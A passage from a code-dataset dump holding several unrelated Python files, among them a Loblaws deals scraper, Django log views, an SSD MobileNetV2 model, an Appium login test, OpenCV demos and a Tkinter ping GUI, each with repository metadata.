\"product-facade/v3/products/deals\")\n self.STORE_NAME = \"Loblaws\"\n self.STORE_URL = (\"https://www.loblaws.ca/deals/all?sort=relevance&\"\n \"category=27985&promotions=Price%20Reduction\")\n\n def get_products(self):\n self.driver.get(self.STORE_URL)\n time.sleep(5)\n\n self._scroll_down()\n # self.driver.save_screenshot(\"loblaws_sc.png\")\n items = self._get_required_responses()\n processed_data = self._process_items(items)\n self.driver.quit()\n\n return processed_data\n\n def _process_items(self, items):\n # Prepare data to be added to the database\n processed_data = []\n for item in items:\n link = \"https://www.loblaws.ca\" + item[\"link\"]\n expiry_date_txt = item[\"badges\"][\"dealBadge\"][\"expiryDate\"]\n expiry_date = datetime.strptime(expiry_date_txt[:10], \"%Y-%m-%d\")\n expiry_date_str = expiry_date.strftime(\"%Y%m%d\")\n tup = (item[\"name\"], self.STORE_NAME,\n item[\"prices\"][\"price\"][\"value\"],\n item[\"prices\"][\"wasPrice\"][\"value\"], link,\n item[\"packageSize\"], date.today().strftime(\"%Y%m%d\"),\n expiry_date_str)\n processed_data.append(tup)\n return processed_data\n\n def _scroll_down(self):\n # Scroll down to the bottom of the page to load all offers\n get_height_command = \"return document.body.scrollHeight\"\n last_height = self.driver.execute_script(get_height_command)\n new_height = -1\n while last_height != new_height:\n last_height = new_height\n scroll_down = \"window.scrollTo(0, document.body.scrollHeight);\"\n self.driver.execute_script(scroll_down)\n time.sleep(1)\n new_height = self.driver.execute_script(get_height_command)\n\n def _get_required_responses(self):\n # Only decode and return responses that came from their deals POST API\n items = []\n for request in self.driver.requests:\n if request.url == self.LOBLAWS_API_URL:\n response = request.response\n if response is None:\n continue\n body = decode(response.body,\n response.headers.get(\"Content-Encoding\",\n \"identity\"))\n json_body = json.loads(body.decode(\"utf-8\"))\n items.extend(json_body[\"results\"])\n return items\n","repo_name":"karimzakir02/Sales-Toronto","sub_path":"webapp/selenium_webscrapers/loblaws_selenium_webscraper.py","file_name":"loblaws_selenium_webscraper.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23584934421","text":"#! 
/bin/python\n\nfrom sys import stdin\nfrom math import inf\n\nT = int(stdin.readline())\n\n\nfor t in range(T):\n [N, Q] = [int(x) for x in stdin.readline().split()]\n cities = []\n for _ in range(N):\n [e, s] = stdin.readline().split()\n cities.append((int(e), int(s)))\n\n G = []\n for _ in range(N):\n G.append([int(x) for x in stdin.readline().split()])\n\n for _ in range(Q):\n [u, v] = [int(x) for x in stdin.readline().split()]\n\n # Small case\n minTime = [inf]*N\n minTime[N-1] = 0\n for city in range(N-2, -1, -1):\n times = []\n d = 0\n for dest in range(city+1, N):\n (e, s) = cities[city]\n # d = sum(G[x][x+1] for x in range(city, dest))\n d += G[dest-1][dest]\n if e >= d:\n times.append(minTime[dest] + d/s)\n else:\n break\n minTime[city] = min(times)\n\n print(\"Case #{}: {}\".format(t+1, minTime[0]))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_208/318.py","file_name":"318.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15830858654","text":"from django.http import HttpResponse\n# from polls.models import Device\n# from polls.models import LogMsg\nfrom ORM.models import logs\nfrom ORM.models import Device\nfrom django.template import Context, loader\nfrom django.shortcuts import render_to_response\n\nfrom forms import FilterForm\nfrom ORM.models import AllDevicesId\n\nimport time\n# from MongoDb import *\n# from pymongo import Connection\n# from pymongo.errors import ConnectionFailure\n\nfrom django.middleware.csrf import get_token\n\ndef index(request):\n\t\n\t#~ devices_list = logs.objects.distinct('deviceId')\n\t#~ devices_list = Device.objects.order_by('deviceid')\n\tget_token(request)\n\tfilterForm=FilterForm()\n\t#~ print filterForm.as_table()\n\t\n\tdevices_list = Device.objects.all()\n\t\n\tdevices_list=list(devices_list)\n\t#~ devices_list=[Device(deviceId=AllDevicesId,lastActivityTime=max([x.lastActivityTime for x in devices_list if hasattr(x,'lastActivityTime')]))]+devices_list\n\t\n\t#~ devices_list.sort()\n\tlatest_poll_list = logs.objects.order_by('+time')\n\treturn render_to_response('polls/logList.html', {\n\t\t'latest_poll_list': latest_poll_list,\n\t\t'devices_list':devices_list,\n\t\t'error_message':'',\n\t\t'filterForm':filterForm,\n\t})\n\ndef detail(request, poll_id):\n\tget_token(request)\n\t# m=MongoDb()\n\t# return HttpResponse(\"You're looking at poll %s.\" % poll_id)\n\t# latest_poll_list=m.db.logs.find({})\n\t# latest_poll_list = LogMsg.objects.all()#.order_by('-deviceId')[:5]\n\t# l=logs(deviceId='00fe00898989',data='hi at '+str(time.time()))\n\t# l.save()\n\t#~ devices_list = logs.objects.values('deviceId')\n\t\n\t\n\t#~ devices_list=devices_list.sort()\n\t#~ latest_poll_list = logs.objects.all()#.order_by('-deviceId')[:5]\n\t#~ latest_poll_list = logs.objects(data='myNewMsg')\n\t#~ devices_list = logs.objects.distinct('deviceId')\n\t#~ devices_list.sort()\n\tdevices_list = Device.objects.all()\n\n\tdevices_list=list(devices_list)\n\tdevices_list=[Device(deviceId=AllDevicesId,lastActivityTime=min([x.lastActivityTime for x in devices_list]))]+devices_list\n\n\t\n\tlatest_poll_list = logs.objects(deviceId=poll_id).order_by('+time')\n\t#~ print 'formattedTime',latest_poll_list[-1].formattedTime\n\treturn render_to_response('polls/logList.html', {\n\t\t'latest_poll_list': 
latest_poll_list,\n\t\t'devices_list':devices_list,\n\t\t'error_message':'',\n\t})\n","repo_name":"voidoftime/LogServer","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37434119533","text":"\n\"\"\"\nFix CSV files with newlines in some of the fields.\n\nDepends on every field being quoted and using double quotation marks for literal\nquotation marks in a field.\n\"\"\"\n\nfrom argparse import ArgumentParser\n\n\ndef fix_newlines(filename):\n \"\"\"Fix the newlines in the given file.\"\"\"\n with open(filename, encoding=\"ISO-8859-1\") as csvfile:\n # go through the csvfile finding lines with odd numbers of quotation\n # marks. When we hit one, collect up the field contents until we find another\n # one\n in_multiline = False\n multilines = []\n for line in csvfile:\n balanced = (line.count('\"') % 2 == 0)\n if in_multiline:\n multilines.append(line.rstrip()) # take off the newline here\n if balanced:\n # this is not the last line, just keep going\n pass\n else:\n # this is the last line of the section, emit everything\n print(\" \".join(l.rstrip() for l in multilines))\n multilines = []; in_multiline = False\n\n else: # not in a multi-line section\n if line.count('\"') % 2 == 0:\n # line has balanced quotes, just emit it\n print(line, end='') # line already has a newline at the end\n else:\n # line has unbalanced quotes so it starts a\n # multi-line section\n multilines.append(line.rstrip())\n in_multiline=True\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"input_filename\")\n\n args = parser.parse_args()\n fix_newlines(args.input_filename)\n","repo_name":"USDAForestService/NRM-Grants-Agreements","sub_path":"import/fix_csv_newlines.py","file_name":"fix_csv_newlines.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"69904673475","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nimport pandas as pd\nimport matplotlib.ticker as ticker\n\n\n@ticker.FuncFormatter\ndef major_formatter(x, pos):\n label = str(int(-1*x)) if x >= 0 else str(x)\n return label\n\n\ndef forceAspect(ax,aspect=1):\n im = ax.get_images()\n extent = im[0].get_extent()\n ax.set_aspect(abs((extent[1]-extent[0])/(extent[3]-extent[2]))/aspect)\n\n\nalpha, gamma, mu, nu = np.loadtxt('postprocessing/data_models/it0100_npts0110.dat').T #Transposed for easier unpacking\n\nprint(\"len alpha:\", len(alpha))\nprint(\"len gamma:\", len(gamma))\n\nnrows, ncols = 100, 100\n\ngrid = mu.reshape((nrows, ncols))\n\n############## plot alpha gamma plane ########################################\nfig, ax = plt.subplots()\n\nax.yaxis.set_major_formatter(major_formatter)\nax.xaxis.set_major_formatter(major_formatter)\n\nplt.gca().set_aspect('equal', adjustable='box')\nplt.imshow(grid, extent=(alpha.min(), alpha.max(), gamma.max(), gamma.min()),\n interpolation='bessel', cmap=cm.viridis)#, origin=\"lower\")\n\n#### plot star at minimum point\n\nit, npts, alpha_hat, gamma_hat, mu_hat, nu_hat = np.loadtxt(\"postprocessing/minimum_predictions.dat\").T\n\nalpha_min = alpha_hat[-1]\ngamma_min = gamma_hat[-1]\n\nplt.plot(alpha_min, gamma_min, marker='*', markersize=15, color=\"red\")\n\nplt.gca().invert_yaxis()\n#plt.colorbar().set_label(u\"\\u03bc(x)\", size=12)\nplt.colorbar().set_label(u\"$g(x)$\", 
size=12)\ncbar_ax = fig.axes[-1]\ncbar_ax.tick_params(labelsize=15)\n\n\n\n##### plot black contour lines\nN = 25\nplt.tricontour(alpha, gamma, mu, N, colors='k',linewidths=1)\n\nplt.xticks(fontsize=12)\nplt.yticks(fontsize=12)\nplt.xlabel(r\"log($\\alpha$)\", fontsize=15)\nplt.ylabel(r\"log($\\gamma$)\", fontsize=15)\n\nax.set_aspect(2)\nforceAspect(ax,aspect=1)\n\n#plt.tight_layout()\n#plt.savefig(\"map_4k.png\", dpi=200)\nplt.show()\n","repo_name":"astuke/HyperTune","sub_path":"bo/plot_boss_colormap.py","file_name":"plot_boss_colormap.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39542764873","text":"import tensorflow as tf\nfrom keras.layers import Layer, Input, Conv2D, MaxPool2D, Activation\nfrom keras.models import Model\nfrom keras.applications import MobileNetV2\nfrom models.prediction_head import get_head_from_outputs\n# header\n# THIS ARCHITECTURE TOO BIG FOR GTX1050 3GB AND I5 7500 3.4 GHZ\n\ndef get_model(hyper_params):\n \"\"\"Generate ssd model and hyper params\n\n Args:\n hyper_params (dictionary): dictionary of parameter\n\n Output:\n ssd_model (tf.keras.Model): a ssd model with backbone vgg16\n \"\"\"\n img_size = hyper_params[\"img_size\"]\n # +1 for ratio 1 based in the original ssd paper\n base_model = MobileNetV2(input_shape=(img_size[1], img_size[0], 3), include_top=False)\n input_ = base_model.input\n conv_fm1 = base_model.get_layer(\"block_13_expand_relu\").output\n conv_fm2 = base_model.output\n # extra conv layer\n conv_fm3_1 = Conv2D(256, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm3_1\")(conv_fm2)\n conv_fm3_2 = Conv2D(512, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm3_2\")(conv_fm3_1)\n #\n conv_fm4_1 = Conv2D(128, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm4_1\")(conv_fm3_2)\n conv_fm4_2 = Conv2D(256, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm4_2\")(conv_fm4_1)\n #\n conv_fm5_1 = Conv2D(128, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm5_1\")(conv_fm4_2)\n conv_fm5_2 = Conv2D(256, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm5_2\")(conv_fm5_1)\n #\n conv_fm6_1 = Conv2D(128, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm6_1\")(conv_fm5_2)\n conv_fm6_2 = Conv2D(256, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm6_2\")(conv_fm6_1)\n \n\n pred_deltas, pred_labels = get_head_from_outputs(hyper_params, [conv_fm1, conv_fm2, conv_fm3_2, conv_fm4_2, conv_fm5_2, conv_fm6_2])\n # return Model(inputs=input_, outputs=[conv_fm1, conv_fm2, conv_fm3_2, conv_fm4_2, conv_fm5_2, conv_fm6_2])\n return Model(inputs=input_, outputs=[pred_deltas, pred_labels])\n\n\ndef init_model(model):\n \"\"\"Initiate model with dummy data for load weight with optimizer state and graph construction\n\n Args:\n model (tf.keras.Model): _description_\n \"\"\"\n _model = model(tf.random.uniform((1, 500, 500, 3)))\n # print(_model.summary())\n # print(_model[0].shape)\n # print(_model[1].shape)\n # print(_model[2].shape)\n # print(_model[3].shape)\n # print(_model[4].shape)\n # print(_model[5].shape)\n # 
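All four extra SSD blocks above share one shape: a 1x1 convolution that squeezes channels followed by a stride-2 3x3 convolution that halves the spatial resolution, which is what gives SSD its progressively coarser feature maps. They could be generated by a small helper; a hypothetical refactor (the helper name is mine, not from the repository):

from keras.layers import Conv2D

def extra_feature_block(x, squeeze_ch, out_ch, name):
    # 1x1 conv reduces channels, 3x3 stride-2 conv downsamples by 2
    x = Conv2D(squeeze_ch, (1, 1), strides=(1, 1), padding="valid",
               activation="relu", name=name + "_1")(x)
    return Conv2D(out_ch, (3, 3), strides=(2, 2), padding="same",
                  activation="relu", name=name + "_2")(x)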
(end of shape checks)\n","repo_name":"Muhammadiqbal-git/SSD_TF_SKRIPSI","sub_path":"Workspace/code/models/ssd_mobilenet_v2.py","file_name":"ssd_mobilenet_v2.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13079688123","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\nfrom appium import webdriver\n\n\nclass TestOne(object):\n\n    def __init__(self, platformname, devicename, platformversion, apppackage,\n                 appactivity, unicodekeyboard, resetkeyboard):\n        self.platformName = platformname\n        self.deviceName = devicename\n        self.platformVersion = platformversion\n        self.appPackage = apppackage\n        self.appActivity = appactivity\n        self.unicodeKeyboard = unicodekeyboard\n        self.resetKeyboard = resetkeyboard\n        self.desired_caps = {\n            'platformName': self.platformName,\n            'deviceName': self.deviceName,\n            'platformVersion': self.platformVersion,\n            'appPackage': self.appPackage,\n            'appActivity': self.appActivity,\n            'resetKeyboard': self.resetKeyboard,\n            'unicodeKeyboard': self.unicodeKeyboard\n        }\n\n    def return_driver(self):\n        driver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", self.desired_caps)\n        return driver\n\n    @staticmethod\n    def target_click(x1, y1, driver): # x1, y1 are coordinates on the reference device the script was written against\n        wd = driver\n        x_1 = x1/1080 # x as a fraction of the reference width (1080)\n        y_1 = y1/1980 # y as a fraction of the reference height (1980)\n        x = wd.get_window_size()['width'] # actual screen width of the current device\n        y = wd.get_window_size()['height'] # actual screen height of the current device\n        print(x_1*x, y_1*y) # print the tap coordinates\n        wd.tap([(x_1*x, y_1*y)], 500) # simulate a single-finger tap\n\n\nif __name__ == '__main__':\n    test_one = TestOne('Android', 'emulator-5554', '5.1.1', 'com.hbskjd.driver',\n                       'com.hbskjd.driver.ui.login.LoginActivity', True, True)\n    adriver = test_one.return_driver()\n    print(type(adriver))\n    adriver.implicitly_wait(8)\n    # driver.find_element_by_id('android:id/button2').click()\n    adriver.find_element_by_id(\"com.hbskjd.driver:id/login_phone\").send_keys('13168775547')\n    adriver.find_element_by_id('com.hbskjd.driver:id/login_psw').send_keys('123456')\n    adriver.find_element_by_id('com.hbskjd.driver:id/login_finish').click()\n","repo_name":"1655490577/StudyCodes","sub_path":"OldProject/历史文件/webdriver/appium/Aoneone.py","file_name":"Aoneone.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33543166414","text":"#!/usr/bin/env python\n\nfrom imutils import perspective\nfrom skimage.filters import threshold_local\nimport cv2\nimport imutils\nimport numpy as np\n \nimage = cv2.imread(\"chass2.jpeg\")\nw=image.shape[0]\nh=image.shape[1]\nratio = image.shape[0] / 500.0 \norig = image.copy()\nimage = imutils.resize(image, height=500)\n \ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = cv2.GaussianBlur(gray, (5, 5), 0)\nedged = cv2.Canny(gray, 75, 200)\n \ncnts= cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) \ncnts = cnts[0] if imutils.is_cv2() else cnts[1] \ncnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5] \n \nfor c in cnts:\n    peri = cv2.arcLength(c, True)\n    approx = cv2.approxPolyDP(c, 0.01 * peri, True)\n    if len(approx) == 4: \n        screenCnt = approx\n        break\n \n \npoint1=screenCnt.reshape(4,2).astype(np.float32)\n# point2 = np.array([[0,0],[0,420],[297,420],[297,0]],dtype = \"float32\")\npoint2 = np.array([[104,58],[104,478],[401,478],[401,58]],dtype = \"float32\")\n \n# point1 = np.array([[308,230],[500,230],[308,640],[500,640]],dtype = \"float32\")\n# point2 = 
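The proportional tap in target_click above is worth isolating, because a pure function is easy to unit-test without a connected device; a minimal sketch using the 1080x1980 reference resolution from the code above (the helper name is mine):

def scale_tap(x_ref, y_ref, target_w, target_h, ref_w=1080, ref_h=1980):
    # map a coordinate recorded on the reference device onto the current screen
    return (x_ref / ref_w * target_w, y_ref / ref_h * target_h)

assert scale_tap(540, 990, 720, 1280) == (360.0, 640.0)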
np.array([[308,230],[500,230],[155,30],[835,30]],dtype = \"float32\")\nM = cv2.getPerspectiveTransform(point1,point2)\nout_img = cv2.warpPerspective(image,M,(image.shape[0],700))\ndst=cv2.perspectiveTransform(point2.reshape(1,4,2), M)\n \n \ncv2.imshow(\"Original\", image)\ncv2.imshow(\"Scanned\",cv2.resize(out_img,(image.shape[0],700)))\ncv2.waitKey(0)","repo_name":"lybhit/py_tools","sub_path":"scripts/perspec_transform.py","file_name":"perspec_transform.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41508694947","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\n\r\n'''\r\n# eg.7\r\nimg = np.zeros((512, 512, 3), np.uint8)\r\n\r\n# draw a line\r\ncv2.line(img, (0, 0), (511, 511), (255, 0, 0), 5)\r\n# draw a rectangle\r\ncv2.rectangle(img, (384, 0), (510, 128), (0, 255, 0), 3)\r\n# draw a circle\r\ncv2.circle(img, (447, 63), 63, (0, 0, 255), -1)\r\n# draw an ellipse\r\ncv2.ellipse(img, (256, 256), (100, 50), 0, 0, 180, 255, -1)\r\n# draw a polygon\r\npts = np.array([[10, 5], [20, 30], [70, 20], [50, 10]], np.int32)\r\npts.reshape((-1, 1, 2))\r\n# the first argument -1 means this dimension is inferred from the remaining ones\r\n\r\n# draw text\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\ncv2.putText(img, 'OpenCV', (10, 500), font, 4, (255, 255, 255), 2)\r\n\r\n# display\r\nwinname = 'eg.7'\r\ncv2.namedWindow(winname)\r\ncv2.imshow(winname, img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n# eg.8\r\nevents = [i for i in dir(cv2) if 'EVENT' in i]\r\nprint(events)\r\n\r\n# eg.9\r\n# draw a circle wherever the image is double-clicked\r\n\r\n\r\ndef draw_circle(event, x, y, flags, param):\r\n    if event == cv2.EVENT_MBUTTONDBLCLK:\r\n        cv2.circle(img, (x, y), 100, (255, 0, 0), -1)\r\n\r\n\r\nimg = np.zeros((512, 512, 3), np.uint8)\r\ncv2.namedWindow('eg.9')\r\ncv2.setMouseCallback('eg.9', draw_circle)\r\n\r\nwhile(1):\r\n    cv2.imshow('eg.9', img)\r\n    if cv2.waitKey(20) & 0xFF == 27:\r\n        break\r\ncv2.destroyAllWindows()\r\n'''\r\n\r\n# eg.10\r\n# draw rectangles or circles while dragging the mouse, depending on the selected mode (like a paint program)\r\n\r\n# becomes True while the mouse button is held down\r\ndrawing = False\r\n# if mode is True draw rectangles; pressing 'm' switches to drawing curves\r\nmode = True\r\nix, iy = -1, -1\r\n\r\n\r\n# create the callback function\r\ndef draw_circle(event, x, y, flags, param):\r\n    global ix, iy, drawing, mode\r\n    # record the starting coordinates when the left button is pressed\r\n    if event == cv2.EVENT_LBUTTONDOWN:\r\n        drawing = True\r\n        ix, iy = x, y\r\n    # draw while moving with the left button held down; event reports motion, flags whether the button is down\r\n    elif event == cv2.EVENT_MOUSEMOVE and flags == cv2.EVENT_FLAG_LBUTTON:\r\n        if drawing == True:\r\n            if mode == True:\r\n                cv2.rectangle(img, (ix, iy), (x, y), (0, 255, 0), -1)\r\n            else:\r\n                # draw small circles; chained together they form a line, 3 is the stroke width\r\n                cv2.circle(img, (x, y), 3, (0, 0, 255), -1)\r\n                # the commented code below uses the start point as the centre and start-to-end distance as the radius\r\n                # r = int(np.sqrt((x - ix)**2 + (y - iy)**2))\r\n                # cv2.circle(img, (x, y), r, (0, 0, 255), -1)\r\n    # stop drawing when the mouse button is released\r\n    elif event == cv2.EVENT_LBUTTONUP:\r\n        drawing = False\r\n        # if mode == True:\r\n        #     cv2.rectangle(img, (ix, iy), (x, y), (0, 255, 0), -1)\r\n        # else:\r\n        #     cv2.circle(img, (x, y), 5, (0, 0, 255), -1)\r\n\r\n\r\nimg = np.zeros((512, 512, 3), np.uint8)\r\ncv2.namedWindow('eg.10')\r\ncv2.setMouseCallback('eg.10', draw_circle)\r\nwhile(1):\r\n    cv2.imshow('eg.10', img)\r\n    k = cv2.waitKey(1) & 0xFF\r\n    if k == ord('m'):\r\n        mode = not mode\r\n    elif k == 27:\r\n        break","repo_name":"EXfeiniao/some-code","sub_path":"OpenCv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24985211237","text":"from tkinter import *\nimport tkinter.font as tkFont\nfrom main 
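cv2.getPerspectiveTransform, used in both scripts above, expects exactly four source points and four destination points in corresponding order; the resulting 3x3 homography can be sanity-checked with cv2.perspectiveTransform on the source points. A minimal round-trip check with synthetic coordinates, independent of the scanned images:

import cv2
import numpy as np

src = np.float32([[0, 0], [0, 100], [100, 100], [100, 0]])
dst = np.float32([[10, 5], [8, 95], [92, 98], [95, 7]])
M = cv2.getPerspectiveTransform(src, dst)
mapped = cv2.perspectiveTransform(src.reshape(1, 4, 2), M)
assert np.allclose(mapped.reshape(4, 2), dst, atol=1e-4)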
import *\nfrom Classes import IP_address\n\nbackground_color=\"#DFDFDF\"\n\ndef add_header(root):\n    header_frame = Frame(root, width=500, height=50, bg=background_color)\n    header_frame.grid(row=0, column=0, padx=10, pady=5, sticky='w' + 'e' + 'n' + 's')\n\n    Label(header_frame, font=('Helvetica', 12, 'bold'), text=\" \", justify=LEFT, bg=background_color) \\\n        .grid(row=0, column=0, padx=0, pady=5)\n    Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"שם רשת\", justify=LEFT, bd=5, bg=background_color) \\\n        .grid(row=0, column=1, padx=40, pady=5)\n    Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"IP כתובת\", bg=background_color) \\\n        .grid(row=0, column=2, padx=40, pady=5)\n    Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"סטאטוס פעילות\", bg=background_color) \\\n        .grid(row=0, column=3, padx=30, pady=5)\n    Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"עדכון אחרון\", justify=RIGHT, bg=background_color) \\\n        .grid(row=0, column=4, padx=15, pady=5)\n\ndef add_body(root, list_of_all_addresses):\n    middle_frame = Frame(root, width=700, height=300, bg=background_color)\n    middle_frame.grid(row=1, column=0, padx=10, pady=5)\n\n    canvas = Canvas(middle_frame, width=620, height=300, borderwidth=0, bg=background_color, highlightthickness=0)\n    frame = Frame(canvas, bg=background_color)\n    vsb = Scrollbar(middle_frame, orient=\"vertical\", command=canvas.yview, bg=background_color)\n    canvas.configure(yscrollcommand=vsb.set)\n\n    vsb.pack(side=\"right\", fill=\"y\")\n    canvas.pack(side=\"left\", fill=\"both\", expand=False)\n    canvas.create_window((4, 4), window=frame, anchor=\"nw\")\n\n    frame.bind(\"<Configure>\", lambda event, canvas=canvas: onFrameConfigure(canvas))\n\n    insert_to_middle(frame, list_of_all_addresses)\n\ndef add_footer(root):\n\n    footer_frame = Frame(root, width=700, height=150, bg=background_color)\n    footer_frame.grid(row=2, column=0, padx=10, pady=5, sticky='w' + 'e' + 'n' + 's')\n\n    Button(footer_frame, activeforeground=\"green\", text=\" חדשה IP הוסף כתובת \",\n           bd=4, command=lambda: new_ip_window(root,footer_frame), font=('Helvetica', 12, 'bold')) \\\n        .grid(row=0, column=0, padx=100, pady=5, sticky='w' + 'e' + 'n' + 's')\n\n    Button(footer_frame, text=\"התחל סריקה\", command= lambda: new_scanning(root), bd=4,\n           font=('Helvetica', 12, 'bold')) \\\n        .grid(row=1, column=1, padx=80, pady=5, sticky='w' + 'e' + 'n' + 's')\n\ndef ok_clicked(main_ui_footer, new_ip_window,ip_number, ip_name):\n    ip = ip_number.get()\n    name = ip_name.get()\n    print(ip, name)\n\n    path = \"first_data.xlsx\"\n\n    add_data_to_file(path, name, ip)\n\n    Label(main_ui_footer, text=\"יש לסרוק בשנית על מנת לראות את הכתובת שהתווספה\", bg=background_color,\n          font=('Helvetica', 12, 'bold')).grid(row=1, column=0, padx=10, pady=0)\n\n    new_ip_window.destroy()\n\ndef cancel_clicked(root):\n    print(\"cancel window\")\n    root.destroy()\n\ndef new_ip_window(root, main_footer):\n    new_ip_window = Toplevel(root)\n    new_ip_window.title(\"New Window\")\n    new_ip_window.config(bg=background_color)\n\n    # Create three frames -> header -- middle -- footer\n    header_frame = Frame(new_ip_window, width=300, height=50, bg=background_color)\n    header_frame.grid(row=0, column=0, padx=10, pady=5)\n\n    body_frame = Frame(new_ip_window, width=300, height=200, bg=background_color)\n    body_frame.grid(row=1, column=0, padx=10, pady=5)\n\n    footer_frame = Frame(new_ip_window, width=300, height=100, bg=background_color)\n    footer_frame.grid(row=2, column=0, padx=10, pady=5, sticky='w' + 'e' + 'n' + 's')\n    # 
---------------------------------------------------------------------------\n ip_name = StringVar()\n ip_number = StringVar()\n\n Label(header_frame, text=\"חדשה IP הוספת כתובת\", bg=background_color, font=('Helvetica', 12, 'bold')).grid(row=0, column=0, padx=10, pady=5)\n\n Label(body_frame, text=\":שם\", bg=background_color).grid(row=0, column=1, padx=10, pady=5)\n name_entry = Entry(body_frame, textvariable = ip_name).grid(row=0, column=0, padx=10, pady=5)\n\n Label(body_frame, text=\":IP כתובת\", bg=background_color).grid(row=1, column=1, padx=10, pady=5)\n ip_entry = Entry(body_frame, textvariable = ip_number).grid(row=1, column=0, padx=10, pady=5)\n\n Button(footer_frame, activeforeground=\"green\", text=\" אישור \",\n command=lambda: ok_clicked(main_footer, new_ip_window, ip_number, ip_name), font=('Helvetica', 10, 'bold')) \\\n .grid(row=0, column=0, padx=5, pady=5)\n\n Button(footer_frame, text=\" ביטול \", command=lambda: cancel_clicked(new_ip_window),\n font=('Helvetica', 10, 'bold'))\\\n .grid(row=0, column=1, padx=5, pady=5)\n\ndef new_scanning(old_window):\n list_of_all_addresses = main_algo()\n print(\"new window opened\")\n old_window.destroy()\n abc = Tk()\n creating_window(abc, list_of_all_addresses)\n\ndef onFrameConfigure(canvas):\n #Reset the scroll region to encompass the inner frame\n canvas.configure(scrollregion=canvas.bbox(\"all\"))\n\ndef insert_to_middle(frame, list_of_all_addresses):\n\n i = 1\n font_style = tkFont.Font(family=\"Lucida Grande\", size=14)\n font_time_style = tkFont.Font(family=\"Lucida Grande\", size=10)\n\n for key in list_of_all_addresses:\n Label(frame, text=\"%s\" % i, width=3, borderwidth=\"1\", bg=background_color,\n relief=\"solid\").grid(row=i, column=0, padx=5, pady=5)\n\n name = list_of_all_addresses[key].name\n ip = list_of_all_addresses[key].ip\n status = list_of_all_addresses[key].status\n last_modify = list_of_all_addresses[key].modify\n\n Label(frame, text=name, font = font_style, anchor= \"w\", bg=background_color).grid(row=i, column=1, padx=5, pady=5)\n Label(frame, text=ip, font = font_style, bg=background_color).grid(row=i, column=2, padx=5, pady=5)\n\n # xyz = tk.Frame(frame, background=\"red\").grid(row=i, column=3, padx=10, pady=1)\n if status == \"work\":\n color = '#489640'\n else:\n color = '#c62121'\n Label(frame, text=\" \",\n font=font_style, bg=color).grid(row=i, column=3, padx=5, pady=5)\n Label(frame, text=last_modify, font = font_time_style, bg=background_color).grid(row=i, column=4, padx=5, pady=5)\n i += 1\n\ndef creating_window(window_name, list_of_all_addresses):\n\n window_name.title(\"Ping Swipping\")\n window_name.config(bg=background_color)\n\n\n # Create three frames -> header -- middle -- footer\n add_header(window_name)\n add_body(window_name, list_of_all_addresses)\n add_footer(window_name)\n\n\nif __name__ == '__main__':\n\n # run the algo and show the object\n list_of_all_addresses = read_old_data()\n\n root = Tk() # create root window\n root.iconbitmap(\"icon_image.ico\")\n creating_window(root, list_of_all_addresses)\n\n root.mainloop()\n\n","repo_name":"David-Elkabas/IP-sweeper","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":7065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38217178599","text":"import rasterio\nimport socket\nimport json\nimport pandas as pd \n\n\n# In 3857\ndata = pd.read_csv(\"/Users/zzz/exp/jrc/sqkm/grid/grid_mos.csv\") \n\n# left,top,right,bottom,id\nsales = []\n\n# In 3857\nwith 
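The Canvas-wrapping-a-Frame construction in add_body above is the standard Tkinter recipe for a scrollable widget grid; the <Configure> binding grows the scroll region whenever the inner frame changes size. Stripped to its essentials (widget names are mine):

import tkinter as tk

root = tk.Tk()
canvas = tk.Canvas(root, width=300, height=200)
inner = tk.Frame(canvas)
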